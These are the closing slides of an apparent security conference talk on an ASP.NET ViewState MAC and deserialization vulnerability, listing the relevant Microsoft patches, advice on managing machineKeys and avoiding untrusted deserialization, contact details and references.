  • 45. Is the ugly bug really dead? If I have your machineKey… •… I can generate a valid View State MAC too •Well, I can also generate a Forms Authentication cookie among other things… Issue was formally reported to Microsoft in August 2013 •Microsoft took contact with the affected projects How do you manage your machineKeys? 45
  • 46. Agenda About the tale and its storyteller Once upon a time… Tales “Why does .NET need MACs” “Serialization” tales When the stories come together – my tale Time sequence of the (patch) battle Is the ugly bug really dead? Happy end (?) 46
  • 47. The (happy?) end Ensure your products are patched / unaffected •SharePoint (MS13-067 & MS13-100) •Exchange (OWA – MS13-0105) •ASP.NET (KB2905247) •All your other third party ASP.NET sites If you don’t use ASP.NET 4.5.2 yet •Plan to support this version as Microsoft will drop support for elderly version in 2016 47
  • 48. The (happy?) end Verify your ASP.NET applications •Don’t deserialize untrusted documents (e.g. on file uploads) •Don’t re-implement custom Viewstate-like features Ensure you manage your machineKeys correctly •If static keys are defined, manage them as carefully as all the other crypto-stuff •No copy/paste from Internet, dedicated keys per environment, … •Encrypt the sensitive sections of your web.config 48
  • 50. Merci/Thank you! Contact: alexandre.herzog@csnc.ch Blog http://blog.csnc.ch/ LinkedIn http://ch.linkedin.com/in/alexandreherzog/ G+ https://plus.google.com/u/1/109572456864701444940/ Slides: http://slideshare.net/ASF-WS/presentations http://appsec-forum.ch 50
  • 51. References Understanding ASP.NET View State http://msdn.microsoft.com/en-us/library/ms972976.aspx Beware of Serialized GUI Objects Bearing Data https://www.blackhat.com/presentations/bh-dc-10/Byrne_David/BlackHat-DC- 2010-Byrne-SGUI-slides.pdf OWASP - PHP Object Injection https://www.owasp.org/index.php/PHP_Object_Injection Are you my Type? https://media.blackhat.com/bh-us- 12/Briefings/Forshaw/BH_US_12_Forshaw_Are_You_My_Type_WP.pdf Barry Dorrans - Going beyond OWASP (esp. 36:40 to 46:45) http://vimeo.com/108438465 Moving to the .NET Framework 4.5.2 http://blogs.msdn.com/b/dotnet/archive/2014/08/07/moving-to-the-net- framework-4-5-2.aspx Farewell, EnableViewStateMac! http://blogs.msdn.com/b/webdev/archive/2014/09/09/farewell- enableviewstatemac.aspx 51